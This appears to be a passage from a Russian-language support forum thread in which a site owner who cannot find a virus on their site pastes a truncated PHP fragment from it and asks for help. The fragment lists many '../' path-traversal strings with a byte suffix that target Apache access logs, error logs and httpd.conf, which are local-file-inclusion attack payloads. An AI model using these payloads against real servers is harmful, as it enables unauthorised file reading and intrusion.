"../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."", 12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."", 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."", 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."", 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."", 16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."", 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."", 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."", 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."", 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."", 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."", 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."", 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1.""); $lfierror = array( 1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."", 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."", 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."", 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."", 5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."", 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."", 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."", 8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."", 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."", 10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."", 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."", 12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."", 13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."", 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."", 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."", 16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."", 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."", 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."", 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."", 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."", 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."", 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."", 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1.""); $lficonfig = array( 1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."", 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."", 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."", 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."", 5 => "../../../../../../../../../../../../../../.
Если кто сможет помочь, буду премного благодарен.
Просмотр 7 ответов — с 1 по 7 (всего 7)
Просмотр 7 ответов — с 1 по 7 (всего 7)
- Тема «Не могу найти вирус на сайте» закрыта для новых ответов.